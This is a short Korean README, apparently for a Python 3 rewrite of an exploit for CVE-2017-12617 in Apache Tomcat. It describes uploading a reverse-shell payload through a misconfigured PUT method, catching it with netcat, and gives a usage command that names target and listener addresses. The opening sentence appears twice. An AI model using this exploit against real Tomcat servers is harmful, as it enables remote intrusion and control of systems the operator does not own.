
CVE-2017-12617은 Apache Tomcat에서 원격 코드 실행(RCE)으로 이어지는 치명적인 취약점입니다.
CVE-2017-12617은 Apache Tomcat에서 원격 코드 실행(RCE)으로 이어지는 치명적인 취약점입니다.
이 취약점은 버전 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81에서 작동합니다.
오직 8.0.24에서만 테스트되었습니다. 취약점은 애플리케이션 또는 Tomcat 인스턴스 자체에서 잘못 구성된 PUT 옵션을 이용합니다.
PUT을 사용하여 리버스 셸 페이로드를 서버로 전송하고 실행하며, netcat으로 수신 대기합니다.
동일한 익스플로잇의 여러 버전이 인터넷에 존재하지만 Python2 기반이기 때문에, Python 3에서 작동하도록 다시 작성했습니다.
즐기세요.
사용 예시:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
